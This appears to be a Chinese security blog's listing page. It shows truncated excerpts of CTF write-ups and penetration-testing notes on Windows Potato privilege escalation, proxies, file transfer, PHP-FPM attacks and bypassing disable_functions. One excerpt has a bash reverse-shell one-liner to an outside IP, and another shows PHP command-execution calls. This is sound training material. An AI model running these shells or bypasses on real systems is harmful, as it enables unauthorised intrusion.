第七届浙江省大学生网络与信息安全竞赛预赛-WP
签到网安知识大挑战数据存储在js中 aes解密得到flag 签到题1Base92 -> Base85 -> Base64 -> Base62 -> Base58 -> Base45 -> Base32 DASCTF{welcome_to_zjctf_2024} webhack memory访问/robot.txt得到/upload路径
windows提权笔记
土豆家族原理可以与域渗透学习(NTLM篇)的内容结合起来看 一般使用 Potato 提权需要下列两个特权中的一个 SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege 以下用户拥有SeImpersonatePrivilege权限,而 SeAssignPrimaryTokenPrivilege 只有更高权限的账户比如SYSTEM才有 12345
内网渗透学习(代理篇)
本文中使用的代理工具可通过我的脚本一键下载https://github.com/dr0n1/CTF_misc_auto_deploy 反弹shell推荐在本地部署一个reverse-shell-generator,可以很方便的查看命令 以下是几个常用的 bash -i1/bin/sh -i >& /dev/tcp/1.1.1.1/8888 0>&1 nc1234567
内网渗透学习(文件传输篇)
wget & curl在vps或有python环境的主机启动 HTTP 文件服务器 1python3 -m http.server 8000 wget下载文件 1234567891011# 标准下载(保存为相同文件名)wget http://IP:8000/filename# 断点续传wget -c http://IP:8000/filename# 指定保存目录wget -P /path
2024年“羊城杯”粤港澳大湾区网络安全大赛 wp
[初赛] 数据安全data-analy1恢复被打乱的数据 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import csvimport reimport pandas as pddata = pd.read_csv("person_data.csv",
php-fpm攻击总结
PHP-FPM 是 FastCGI 的一个具体实现(协议解析器) Nginx等服务器中间件将用户请求按照fastcgi的规则打包好通过TCP传给FPM,然后FPM按照fastcgi的协议将TCP流解析成真正的数据 举个例子,用户访问http://127.0.0.1/index.php?a=1&b=2,如果web目录是/var/www/html,那么Nginx会
绕过disable_functions的方法总结
常规函数函数绕过123456789101112131415161718<?php//exececho exec('whoami');//shell_exececho shell_exec('whoami');//systemsystem('whoami');//passthrupassthru("whoami")
第十七届全国大学生信息安全竞赛-华东南分区赛
1签到+4web+4pwn web-welcome签到,Ctrl+U web-submitbreak文件上传,有对内容检测,使用短标签绕过 fix添加黑名单 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?php// $path = "./uploads"